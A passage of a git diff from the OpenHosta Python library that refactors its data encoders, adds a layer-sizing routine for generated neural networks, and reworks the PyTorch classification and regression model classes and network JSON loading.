+ def __init__(self) -> None:
+ super().__init__()
+
+ def encode(self, value: int) -> int:
+ return int(value)
+
+ def decode(self, encoded_value: float) -> int:
+ return int(encoded_value)
+
+class FloatEncoder(BaseEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+ def encode(self, value: float) -> float:
return float(value)
- def decode(self, encoded_value: float) -> Union[int, float]:
- return encoded_value
+ def decode(self, encoded_value: float) -> float:
+ return float(encoded_value)
class BooleanEncoder(BaseEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
def encode(self, value: bool) -> int:
return int(value)
@@ -19,108 +39,126 @@ def decode(self, encoded_value: int) -> bool:
return bool(encoded_value)
class StringEncoder(BaseEncoder):
- def __init__(self, existing_dict: Dict[str, int] = None):
- """
- Initialize with optional existing dictionary.
- If existing_dict is provided, we're in inference mode.
- """
- self.inference_mode = existing_dict is not None
- self.word_to_id = {'<UNK>': 0} if existing_dict is None else existing_dict
- self.id_to_word = {v: k for k, v in self.word_to_id.items()}
- self.next_id = max(self.word_to_id.values()) + 1 if self.word_to_id else 1
- self.max_tokens = None
-
- def set_max_tokens(self, max_tokens: int):
- """Set maximum length for encoded sequences"""
+ def __init__(self, dictionary : Dict[str, int], max_tokens : int, inference : bool) -> None:
+ super().__init__()
+ self.dictionary = dictionary
self.max_tokens = max_tokens
+ self.inference = inference
+ self.next_id = max(self.dictionary.values()) + 1 if self.dictionary else 1
- def encode(self, value: str) -> List[int]:
- """
- Encode a string into a list of integers.
- For classification (_outputs), returns a single integer.
- For _inputs features, returns a list of integers of length max_tokens.
- """
- if self.max_tokens is None:
- raise ValueError("max_tokens must be set before encoding")
+ @staticmethod
+ def string_to_list(input_string):
+ tokens = re.findall(r'[a-zA-Zà-ÿ]+|[^a-zA-Zà-ÿ\s]', input_string.lower())
+ return tokens
- words = str(value).lower().strip().split()
+ def encode(self, data: str) -> list[Union[str, int]]:
+ words = self.string_to_list(data)
encoded = []
for word in words:
- if not self.inference_mode and word not in self.word_to_id:
- self.word_to_id[word] = self.next_id
- self.id_to_word[self.next_id] = word
- self.next_id += 1
- encoded.append(self.word_to_id.get(word, 0))
+ if self.inference:
+ encoded.append(self.dictionary.get(word, 0))
+ else:
+ if word not in self.dictionary:
+ self.dictionary[word] = self.next_id
+ encoded.append(self.next_id)
+ self.next_id += 1
+ else:
+ encoded.append(self.dictionary[word])
if len(encoded) > self.max_tokens:
return encoded[:self.max_tokens]
+
return encoded + [0] * (self.max_tokens - len(encoded))
+
+ def decode(self, encoded_value: int) -> str:
+ return self.dictionary.get(encoded_value, '<UNK>')
+
+ @property
+ def get_dictionnary(self) -> Dict[int, str]:
+ return self.dictionary
+
+class MappingEncoder(BaseEncoder):
+ def __init__(self, mapping_dict: Dict[int, Any]) -> None:
+ self.mapping_dict = mapping_dict
- def decode(self, encoded_value: Union[int, List[int]]) -> str:
- """
- Decode either a single integer (classification) or list of integers (features)
- """
- if isinstance(encoded_value, (int, float)):
- return self.id_to_word.get(int(encoded_value), '<UNK>')
+ def encode(self, value: Any) -> int:
+ return self.mapping_dict[value]
- words = []
- for idx in encoded_value:
- if idx != 0: # Skip padding
- words.append(self.id_to_word.get(idx, '<UNK>'))
- return ' '.join(words)
+ def decode(self, encoded_value: int) -> Any:
+ for key, value in self.mapping_dict.items():
+ if value == encoded_value:
+ return key
+ raise ValueError(f"Unknown value: {encoded_value}")
class SimpleEncoder:
- def __init__(self, existing_dict: Dict[str, int] = None):
- self.string_encoder = StringEncoder(existing_dict)
- self.feature_types = {}
+ def __init__(self, max_tokens: int, dictionary: Dict[str, int], dictionary_path : str, mapping_dict: Dict[str, int], inference : bool) -> None:
self.encoders = {
- str: self.string_encoder,
- int: NumericEncoder(),
- float: NumericEncoder(),
+ str: StringEncoder(dictionary, max_tokens, inference),
+ int: IntegerEncoder(),
+ float: FloatEncoder(),
bool: BooleanEncoder()
}
+ self.mapping_dict = mapping_dict
+ self.dictionary_path = dictionary_path
+
+ @staticmethod
+ def init_encoder(max_tokens: int, dictionary: Dict[str, int], dictionary_path : str, mapping_dict: Dict[str, int], inference : bool) -> 'SimpleEncoder':
+
+ encoder = SimpleEncoder(max_tokens, dictionary, dictionary_path ,mapping_dict, inference)
+ return encoder
+
+ def save_dictionary(self, dictionary: Dict[int, str]) -> None:
+ with open(self.dictionary_path, 'w', encoding='utf-8') as f:
+ json.dump(dictionary, f, indent=2, sort_keys=True) # type: ignore
+
+
+ def encode(self, samples: List[Sample]) -> List[Sample]:
- def encode(self, samples: List[Sample], max_tokens: int) -> List[Sample]:
- self.string_encoder.set_max_tokens(max_tokens)
-
encoded_samples = []
for sample in samples:
encoded_input = []
for idx, value in enumerate(sample.input):
- encoder = self.encoders[type(value)]
- self.feature_types[idx] = type(value)
- encoded_value = encoder.encode(value)
- if isinstance(encoded_value, list):
- encoded_input.extend(encoded_value)
+ encoder_in = self.encoders[type(value)]
+ encoded_value_in = encoder_in.encode(value)
+ if isinstance(encoded_value_in, list):
+ encoded_input.extend(encoded_value_in)
else:
- encoded_input.append(encoded_value)
+ encoded_input.append(encoded_value_in)
encoded_output = None
if sample.output is not None:
- if isinstance(sample.output, str):
- print("\033[93mWarning: Multiple string _outputs not supported, only using the first word will be used for _outputs\033[0m")
- output_idx = len(sample.input)
- encoder = self.encoders[type(sample.output)]
- self.feature_types[output_idx] = type(sample.output)
- encoded_output = encoder.encode(sample.output)
- # Like multiple str _outputs not supported only use the first str _outputs
- if isinstance(encoded_output, list):
- encoded_output = encoded_output[0]
-
+ if self.mapping_dict is None:
+ encoder_out = self.encoders[type(sample.output)]
+ encoded_value_out = encoder_out.encode(sample.output)
+ else:
+ encoder_out = MappingEncoder(self.mapping_dict)
+ encoded_value_out = encoder_out.encode(sample.output)
+ encoded_output = encoded_value_out
+
encoded_samples.append(Sample({
- '_inputs': encoded_input,
- '_outputs': encoded_output
+ 'inputs': encoded_input,
+ 'outputs': encoded_output
}))
+ self.save_dictionary(self.encoders[str].get_dictionnary)
return encoded_samples
+
+ def decode(self, predictions: Union[Optional[List[torch.Tensor]], torch.Tensor], output_type: Any) -> Any:
- def decode_prediction(self, prediction: Any, position: int) -> Any:
- if position not in self.feature_types:
- raise ValueError(f"Unknown feature position: {position}")
+ predictions = predictions.cpu().detach().numpy()
+ if predictions is None:
+ return None
+
+ if self.mapping_dict is None:
+ predictions = predictions[0]
+ if output_type not in self.encoders:
+ raise ValueError(f"Unknown output type in decoder: {output_type}")
+ encoder_out = self.encoders[output_type]
+ return encoder_out.decode(predictions)
+ else:
+ value = predictions.argmax()
+ encoder_out = MappingEncoder(self.mapping_dict)
+ return encoder_out.decode(value)
- return self.encoders[self.feature_types[position]].decode(prediction)
- @property
- def dictionary(self) -> Dict[str, int]:
- return self.string_encoder.word_to_id
diff --git a/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py b/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py
new file mode 100644
index 0000000..1f80938
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py
@@ -0,0 +1,87 @@
+import math
+from typing import List
+
+def _get_nb_layer(complexity: int):
+ """
+ Get the number of layers for a neural network based on its complexity.
+ L_total refers to the total number of layers.
+ L_up refers to the number of layers in the upward path.
+ L_down refers to the number of layers in the downward path.
+ """
+ l_total = 2 * complexity + 1
+ l_up = (l_total - 1) // 2
+ l_down = l_total - l_up - 1
+ return l_up, l_down
+
+
+def _round_to_power_of_two(value: float) -> int:
+ """
+ Round a number to the nearest power of 2.
+ """
+ return 2 ** int(round(math.log2(value)))
+
+def _get_layers_size(n_in, n_out, n_peak, l_up, l_down, growth_rate, max_layer_size) -> List[int]:
+ """
+ this function calculates the size of each layer in a neural network.
+ """
+ layers_size = [n_in]
+ current_size = n_in
+
+ # Upward Phase
+ for i in range(l_up):
+ next_size = current_size * growth_rate
+ next_size = min(next_size, n_peak, max_layer_size)
+ next_size = _round_to_power_of_two(next_size)
+ layers_size.append(int(next_size))
+ current_size = next_size
+
+ # Downward Phase
+ for i in range(l_down):
+ next_size = current_size / growth_rate
+ next_size = max(next_size, n_out)
+ next_size = _round_to_power_of_two(next_size)
+ layers_size.append(int(next_size))
+ current_size = next_size
+
+ # Ensure that the last layer size is n_out
+ layers_size[-1] = n_out
+
+ return layers_size
+
+
+def get_algo_architecture(input_size: int, output_size: int, complexity: int, growth_rate: float, max_layer_coefficient: int) -> List[int]:
+ """
+ this function generates the architecture of a neural network.
+ the complexity defines the number of layers in the network.
+ growth_rate defines the rate at which the number of neurons grows.
+ max_layer_coefficient defines the maximum size of the maximum layer.
+ """
+ n_in = input_size
+ n_out = output_size
+ n_max = max(n_in, n_out)
+
+ max_layer_size = max_layer_coefficient * n_max
+
+ l_up, l_down = _get_nb_layer(complexity)
+
+ n_peak = n_in * (growth_rate ** l_up)
+ n_peak = min(n_peak, max_layer_size)
+ n_peak = _round_to_power_of_two(n_peak) # Assurer que n_peak est une puissance de 2
+
+ layers_size = _get_layers_size(n_in, n_out, n_peak, l_up, l_down, growth_rate, max_layer_size)
+
+ return layers_size
+
+
+# test the algorithm
+########################################################
+
+# if __name__ == "__main__":
+# input_size = 8
+# output_size = 2
+# complexity = 5
+# growth_rate = 1.5
+# max_layer_coefficient = 150
+
+# architecture = get_algo_architecture(input_size, output_size, complexity, growth_rate, max_layer_coefficient)
+# print("Generated architecture:", architecture)
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/builtins/classification.py b/src/OpenHosta/exec/predict/model/builtins/classification.py
index d08aabd..9482b8e 100644
--- a/src/OpenHosta/exec/predict/model/builtins/classification.py
+++ b/src/OpenHosta/exec/predict/model/builtins/classification.py
@@ -1,146 +1,156 @@
-### NOT IMPLEMENTED YET ###
-
from typing import Optional
import torch
from torch import nn
from torch import optim
+from torch.optim.lr_scheduler import StepLR
+from .algo_architecture import get_algo_architecture
from ..hosta_model import HostaModel
from ..neural_network import NeuralNetwork
+from ..neural_network_types import ArchitectureType
+from ....predict.predict_config import PredictConfig
from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
-
+from .....core.logger import Logger, ANSIColor
class Classification(HostaModel):
- def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, num_classes: int, device: Optional[str] = None):
+ def __init__(
+ self,
+ neural_network: Optional[NeuralNetwork],
+ input_size: int,
+ output_size: int,
+ config: PredictConfig,
+ logger: Logger,
+ device: Optional[str] = None
+ ):
super().__init__(device)
- self.complexity = complexity
- self.num_classes = num_classes
- self.verbose = True
- self.layers = []
+ self.complexity = config.complexity
+ self.logger = logger
+ self.device = device
+ self.growth_rate = config.growth_rate
+ self.max_layer_coefficent = config.coef_layers
+ self.architecture_type = ArchitectureType.CLASSIFICATION
+
if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
- transition_value = int(((input_size * output_size) / 2) * self.complexity)
-
- input_layer = int(input_size * (2 * self.complexity))
- if input_size > output_size:
- hidden_layer_1 = int(transition_value / output_size)
- else:
- hidden_layer_1 = transition_value
-
- # Define simple fully connected architecture
- self.layers.append(nn.Linear(input_size, input_layer))
- self.layers.append(nn.ReLU()) # Apply ReLU after first layer
- self.layers.append(nn.Linear(input_layer, hidden_layer_1))
- self.layers.append(nn.ReLU()) # Apply ReLU after second layer
- self.layers.append(nn.Linear(hidden_layer_1, output_size))
- else:
- # Use custom user-defined layers from neural network definition if available
- self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ layer_size : list = get_algo_architecture(input_size, output_size, self.complexity, self.growth_rate, self.max_layer_coefficent)
+
+ layers = []
+ for i in range(len(layer_size) - 1):
+ in_features = layer_size[i]
+ out_features = layer_size[i + 1]
- for i, layer in enumerate(self.layers):
- setattr(self, f'fc{i + 1}', layer)
+ linear_layer = nn.Linear(in_features, out_features)
+ layers.append(linear_layer)
+
+ if i < len(layer_size) - 2:
+ activation = nn.ReLU()
+ layers.append(activation)
+ self.model = nn.Sequential(*layers)
+ else:
+ layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ self.model = nn.Sequential(*layers)
- # Set the loss function for classification
if neural_network is None or neural_network.loss_function is None:
- if num_classes == 2:
- self.loss = nn.BCEWithLogitsLoss() # For binary classification
- else:
- self.loss = nn.CrossEntropyLoss() # For multi-class classification
+ self.loss = nn.CrossEntropyLoss()
else:
self.loss = custom_loss_to_pytorch(neural_network.loss_function)
- # Set the optimizer
if neural_network is None or neural_network.optimizer is None:
- self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ self.optimizer = optim.AdamW(self.parameters(), lr=0.001)
else:
- self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001) # TODO: Add learning rate parameter
+
+ self.scheduler = StepLR(self.optimizer, step_size=10, gamma=0.1)
- # Move model to the selected device (CPU or GPU)
self.to(self.device)
def trainer(self, train_set, epochs):
+ """
+ Train the model on the training set for a classification task
+ """
self.train()
for epoch in range(epochs):
+
running_loss = 0.0
- correct = 0
- total = 0
+ correct_predictions = 0
+ total_samples = 0
+
for inputs, labels in train_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).long() # Ensure it's long for cross entropy loss !
+ batch_size = inputs.size(0)
- # Zero parameter gradients
self.optimizer.zero_grad()
-
- # Forward pass
- outputs = self(inputs)
-
- if self.num_classes == 2:
- preds = (torch.sigmoid(outputs) > 0.5).float()
- else:
- preds = torch.argmax(outputs, dim=1)
-
- # Compute Loss
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
+
loss.backward()
self.optimizer.step()
running_loss += loss.item()
-
- # Calculate accuracy
- if self.num_classes == 2:
- correct += (preds == labels).sum().item()
- else:
- correct += (preds == labels.argmax(dim=1)).sum().item()
-
- total += labels.size(0)
-
- accuracy = correct / total
- if self.verbose:
- print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set):.4f}, Accuracy: {accuracy * 100:.2f}%")
-
+ predicted_classes = torch.argmax(outputs, dim=1)
+
+ correct_predictions += (predicted_classes == labels).sum().item()
+ total_samples += batch_size
+
+ self.scheduler.step()
+ current_lr = self.optimizer.param_groups[0]['lr']
+
+ epoch_loss = running_loss / len(train_set)
+ epoch_accuracy = (correct_predictions / total_samples) * 100
+ if epoch == epochs - 1:
+ self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}", color=ANSIColor.CYAN, level=1, one_line=False)
+ else :
+ self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}", color=ANSIColor.CYAN, level=1, one_line=True)
+
def validate(self, validation_set):
- """Validate the model's performance"""
- self.eval() # Set model to evaluation mode
+ """
+ Validate the model on the validation set for a classification task.
+ """
+ self.eval()
validation_loss = 0.0
- correct = 0
- total = 0
+ correct_predictions = 0
+ total_samples = 0
+
with torch.no_grad():
for inputs, labels in validation_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
- outputs = self(inputs)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).long() # Ensure that is long for loss
+ batch_size = inputs.size(0)
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- validation_loss += loss.item()
+ validation_loss += loss.item() * batch_size
- # For Classification Metrics (like binary or multi-class accuracy)
- if self.num_classes == 2:
- # Binary classification: Apply sigmoid and threshold at 0.5
- preds = (torch.sigmoid(outputs) > 0.5).float()
- correct += (preds == labels).sum().item()
- else:
- # Multi-class classification: Use argmax to get class labels
- preds = torch.softmax(outputs, dim=1)
- correct += (preds == labels.argmax(dim=1)).sum().item()
+ predicted_classes = torch.argmax(outputs, dim=1)
- total += labels.size(0)
+ correct_predictions += (predicted_classes == labels).sum().item()
+ total_samples += labels.size(0)
- avg_val_loss = validation_loss / len(validation_set)
- accuracy = correct / total
- print(f"Validation Loss: {avg_val_loss:.4f}, Accuracy: {accuracy * 100:.2f}%")
+ avg_val_loss = validation_loss / total_samples
+ accuracy = (correct_predictions / total_samples) * 100
- return avg_val_loss, accuracy
+ self.logger.log_custom("Validation", f"Loss: {avg_val_loss:.4f}, Accuracy: {accuracy:.2f}%", color=ANSIColor.CYAN, level=1)
+ return # Don't need to return something for now
def inference(self, x):
- """Make prediction on a _inputs inference the model"""
+ """
+ Make prediction on inputs using the model.
+ """
self.eval()
with torch.no_grad():
x = x.to(self.device)
- outputs = self(x)
- if self.num_classes == 2:
- prediction = (torch.sigmoid(outputs) > 0.5).float()
- else:
- prediction = torch.softmax(outputs, dim=1)
- return prediction.cpu()
+
+ # Add batch dimension if needed
+ if x.dim() == 1:
+ x = x.unsqueeze(0)
+
+ outputs = self.model(x)
+
+ probabilities = torch.softmax(outputs, dim=1)
+
+ return probabilities.cpu()
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
index 9838899..135cd43 100644
--- a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
+++ b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
@@ -3,95 +3,155 @@
import torch
from torch import nn
from torch import optim
+from torch.optim.lr_scheduler import StepLR
+from .algo_architecture import get_algo_architecture
from ..hosta_model import HostaModel
from ..neural_network import NeuralNetwork
+from ..neural_network_types import ArchitectureType
+from ....predict.predict_config import PredictConfig
from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+from .....core.logger import Logger, ANSIColor
class LinearRegression(HostaModel):
- def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, device: Optional[str] = None):
+ def __init__(
+ self,
+ neural_network: Optional[NeuralNetwork],
+ input_size: int,
+ output_size: int,
+ config: PredictConfig,
+ logger: Logger,
+ device: Optional[str] = None
+ ):
super().__init__(device)
- self.complexity = complexity
+ self.complexity = config.complexity
+ self.logger = logger
+ self.device = device
+ self.growth_rate = config.growth_rate
+ self.max_layer_coefficent = config.coef_layers
+ self.architecture_type = ArchitectureType.LINEAR_REGRESSION
- self.layers = []
if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
- transition_value = int(((input_size * output_size) / 2) * self.complexity)
-
- input_layer = int(input_size * (2 * self.complexity))
- if input_size > output_size:
- hidden_layer_1 = int(transition_value / output_size)
- else:
- hidden_layer_1 = transition_value
-
- self.layers.append(nn.Linear(input_size, input_layer))
- self.layers.append(nn.ReLU())
- self.layers.append(nn.Linear(input_layer, hidden_layer_1))
- self.layers.append(nn.ReLU())
- self.layers.append(nn.Linear(hidden_layer_1, output_size))
- else:
- self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ layer_size : list = get_algo_architecture(input_size, output_size, self.complexity, self.growth_rate, self.max_layer_coefficent)
+
+ layers = []
+ for i in range(len(layer_size) - 1):
+ in_features = layer_size[i]
+ out_features = layer_size[i + 1]
+
+ linear_layer = nn.Linear(in_features, out_features)
+ layers.append(linear_layer)
- for i, layer in enumerate(self.layers):
- setattr(self, f'fc{i + 1}', layer)
+ if i < len(layer_size) - 2:
+ activation = nn.ReLU()
+ layers.append(activation)
+ self.model = nn.Sequential(*layers)
+ else:
+ layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ self.model = nn.Sequential(*layers)
+
- # Set the loss function
if neural_network is None or neural_network.loss_function is None:
- self.loss = nn.MSELoss()
+ self.loss = nn.SmoothL1Loss()
else:
self.loss = custom_loss_to_pytorch(neural_network.loss_function)
- # Set the optimizer
if neural_network is None or neural_network.optimizer is None:
- self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ self.optimizer = optim.AdamW(self.parameters(), lr=0.01, weight_decay=1e-2)
else:
self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
- # Move model to the selected device (CPU or GPU)
+ self.scheduler = StepLR(self.optimizer, step_size=10, gamma=0.1)
+
self.to(self.device)
- def trainer(self, train_set, epochs, verbose=False):
+ def trainer(self, train_set, epochs):
+ """
+ Training loop for regression models.
+ Includes accuracy calculation with a tolerance (epsilon).
+ """
+ epsilon = 0.1
self.train()
for epoch in range(epochs):
running_loss = 0.0
+ correct_predictions = 0
+ total_samples = 0
+
for inputs, labels in train_set:
- # Move _inputs and labels to the right device
- inputs, labels = inputs.to(self.device), labels.to(self.device)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).float().view(-1, 1) # Ensure proper shape and type
+ batch_size = labels.size(0)
- # Zero the parameter gradients
self.optimizer.zero_grad()
-
- # Forward pass
- outputs = self(inputs)
-
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- # Backward pass and update
loss.backward()
self.optimizer.step()
running_loss += loss.item()
- # if verbose:
- print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set)}")
+
+ correct_predictions += ((outputs - labels).abs() < epsilon).sum().item()
+ total_samples += batch_size
+
+ self.scheduler.step()
+ current_lr = self.optimizer.param_groups[0]['lr']
+
+ epoch_loss = running_loss / len(train_set)
+ epoch_accuracy = (correct_predictions / total_samples) * 100
+ if epoch == epochs - 1:
+ self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}", color=ANSIColor.CYAN, level=1, one_line=False)
+ else :
+ self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}", color=ANSIColor.CYAN, level=1, one_line=True)
+
+
def validate(self, validation_set):
- """Validate the model on a given validation set."""
- self.eval() # Set model to eval mode (disable dropout, etc.)
+ """
+ Validate the model on a given validation set for regression models.
+ Includes accuracy calculation with a tolerance (epsilon).
+ """
+ self.eval()
validation_loss = 0.0
- with torch.no_grad(): # No need to track gradients during validation
+ correct_predictions = 0
+ total_samples = 0
+ epsilon = 0.1
+
+ with torch.no_grad():
for inputs, labels in validation_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
- outputs = self(inputs)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).float().view(-1, 1)
+ batch_size = labels.size(0)
+
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- validation_loss += loss.item()
- return validation_loss / len(validation_set)
+ validation_loss += loss.item() * batch_size
+
+ correct_predictions += ((outputs - labels).abs() < epsilon).sum().item()
+ total_samples += batch_size
+
+ avg_val_loss = validation_loss / len(validation_set)
+ accuracy = (correct_predictions / total_samples) * 100
+
+ self.logger.log_custom("Validation", f"Loss: {avg_val_loss:.4f}, Accuracy: {accuracy:.2f}%", color=ANSIColor.CYAN, level=1, one_line=False)
+
+ return #Nothing to return for now
+
def inference(self, x):
- """Make predictions for the given test set."""
+ """
+ Make predictions on a given input for linear regression task.
+ """
self.eval()
with torch.no_grad():
x = x.to(self.device)
- outputs = self(x)
+
+ if x.dim() == 1:
+ x = x.unsqueeze(0)
+
+ outputs = self.model(x)
+
return outputs
diff --git a/src/OpenHosta/exec/predict/model/hosta_model.py b/src/OpenHosta/exec/predict/model/hosta_model.py
index 08df057..8a3338c 100644
--- a/src/OpenHosta/exec/predict/model/hosta_model.py
+++ b/src/OpenHosta/exec/predict/model/hosta_model.py
@@ -3,21 +3,24 @@
import torch
from torch import nn
+from .neural_network_types import ArchitectureType
class HostaModel(ABC, nn.Module):
def __init__(self, device: Optional[str]):
self.device = device if device is not None else ('cuda' if torch.cuda.is_available() else 'cpu')
self.layers = []
+ self.architecture_type: Optional[ArchitectureType] = None
super().__init__()
def trainer(self, train_set, epochs):
pass
def forward(self, x):
- for layer in self.layers:
- x = layer(x)
- return x
+ # for layer in self.layers:
+ # x = layer(x)
+ # return x
+ pass
def validate(self, validation_set):
pass
@@ -30,4 +33,4 @@ def init_weights(self, path: str):
self.eval()
def save_weights(self, path: str):
- torch.save(self.state_dict(), path, )
+ torch.save(self.state_dict(), path)
diff --git a/src/OpenHosta/exec/predict/model/model_provider.py b/src/OpenHosta/exec/predict/model/model_provider.py
index dc221c2..127580b 100644
--- a/src/OpenHosta/exec/predict/model/model_provider.py
+++ b/src/OpenHosta/exec/predict/model/model_provider.py
@@ -7,28 +7,52 @@
from .neural_network_types import ArchitectureType
from ..predict_config import PredictConfig
from ....core.hosta import Func
+from ....core.logger import Logger, ANSIColor
from ....utils.torch_nn_utils import type_size
class HostaModelProvider:
@staticmethod
- def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, verbose: int) -> Optional[HostaModel]:
+ def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, logger: Logger) -> Optional[HostaModel]:
input_size = 0
for arg in func.f_type[0]:
- input_size += type_size(arg, config.max_tokens)
+ if get_origin(arg) is Literal:
+ input_size += 1
+ else:
+ input_size += type_size(arg, config.max_tokens)
+
output_size = type_size(func.f_type[1], config.max_tokens)
+ logger.log_debug(f"Model with input size {input_size} and output size {output_size}", level=2)
+
hosta_model: Optional[HostaModel] = None
- if config is not None and config.model_type is not None:
- if config.model_type == ArchitectureType.LINEAR_REGRESSION:
- hosta_model = LinearRegression(architecture, input_size, output_size, config.complexity)
- elif config.model_type == ArchitectureType.CLASSIFICATION:
- hosta_model = Classification(architecture, input_size, output_size, config.complexity, 1)
+ model_type = determine_model_type(func)
+
+ if model_type == ArchitectureType.LINEAR_REGRESSION:
+ hosta_model = LinearRegression(architecture, input_size, output_size, config, logger)
+
+ elif model_type == ArchitectureType.CLASSIFICATION:
+ hosta_model = Classification(architecture, input_size, output_size, config, logger)
else:
- if get_origin(func.f_type[1]) == Literal:
- hosta_model = Classification(architecture, input_size, output_size, 4, 1)
- else:
- hosta_model = LinearRegression(architecture, input_size, output_size, 4)
+ raise ValueError(f"Model type {model_type} not supported")
+
+ logger.log_custom("Model", f"Type : {type(hosta_model).__name__}", color=ANSIColor.BLUE_BOLD)
+
+
+ if architecture is None:
+ save_architecture(hosta_model, path, logger)
- with open(path, 'w') as file:
- file.write(NeuralNetwork.from_torch_nn(hosta_model).to_json())
return hosta_model
+
+
+def determine_model_type(func: Func) -> ArchitectureType:
+ if get_origin(func.f_type[1]) is Literal:
+ return ArchitectureType.CLASSIFICATION
+ else:
+ return ArchitectureType.LINEAR_REGRESSION
+
+
+def save_architecture(hosta_model: HostaModel, path: str, logger : Logger):
+ architecture = NeuralNetwork.from_torch_nn(hosta_model)
+ with open(path, 'w', encoding='utf-8') as file:
+ file.write(architecture.to_json())
+ logger.log_custom("Architecture", f"saved to {path}", color=ANSIColor.BRIGHT_GREEN, level=2)
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/neural_network.py b/src/OpenHosta/exec/predict/model/neural_network.py
index ae61278..65e366f 100644
--- a/src/OpenHosta/exec/predict/model/neural_network.py
+++ b/src/OpenHosta/exec/predict/model/neural_network.py
@@ -4,7 +4,7 @@
from torch import nn
from .neural_network_types import LayerType, OptimizerAlgorithm, LossFunction, Layer
-from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom
+from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom, custom_layer_to_pytorch
class NeuralNetwork:
@@ -15,6 +15,7 @@ def __init__(self):
self.layers: list[Layer] = []
self.loss_function: Optional[LossFunction] = None
self.optimizer: Optional[OptimizerAlgorithm] = None
+ self._type = "UNDEFINED"
def add_layer(self, layer: Layer):
"""
@@ -61,6 +62,7 @@ def to_json(self) -> str:
:rtype: str
"""
network_dict = {
+ "type": self._type,
"layers": [
layer.to_json()
for layer in self.layers
@@ -85,22 +87,33 @@ def from_json(cls, json_str: str) -> 'NeuralNetwork':
"""
try:
network_dict = json.loads(json_str)
- network = cls()
+ except json.JSONDecodeError as e:
+ raise ValueError(f"Invalid JSON: {e}")
- if network_dict.get("loss_function", None) is not None:
- network.loss_function = LossFunction[network_dict.get("loss_function", None)]
- else:
- network.loss_function = None
+ network = cls()
- if network_dict.get("optimizer", None) is not None:
- network.optimizer = OptimizerAlgorithm[network_dict.get("optimizer", None)]
- else:
- network.optimizer = None
+ # Set loss function
+ loss_fn_name = network_dict.get("loss_function")
+ if loss_fn_name:
+ try:
+ network.loss_function = LossFunction[loss_fn_name]
+ except KeyError:
+ raise ValueError(f"Unsupported loss function: {loss_fn_name}")
+
+ # Set optimizer
+ optimizer_name = network_dict.get("optimizer")
+ if optimizer_name:
+ try:
+ network.optimizer = OptimizerAlgorithm[optimizer_name]
+ except KeyError:
+ raise ValueError(f"Unsupported optimizer: {optimizer_name}")
- # Add layers
- for layer_dict in network_dict.get("layers", []):
+ # Add layers
+ for layer_dict in network_dict.get("layers", []):
+ try:
+ layer_type = LayerType[layer_dict["layer_type"]]
layer = Layer(
- layer_type=LayerType[layer_dict.get("layer_type", None)],
+ layer_type=layer_type,
in_features=layer_dict.get("in_features"),
out_features=layer_dict.get("out_features"),
kernel_size=layer_dict.get("kernel_size"),
@@ -109,11 +122,12 @@ def from_json(cls, json_str: str) -> 'NeuralNetwork':
dropout=layer_dict.get("dropout")
)
network.add_layer(layer)
+ except KeyError as e:
+ raise ValueError(f"Missing key in layer definition: {e}")
+ except ValueError as e:
+ raise ValueError(f"Invalid value in layer definition: {e}")
- return network
-
- except (json.JSONDecodeError, KeyError, ValueError) as e:
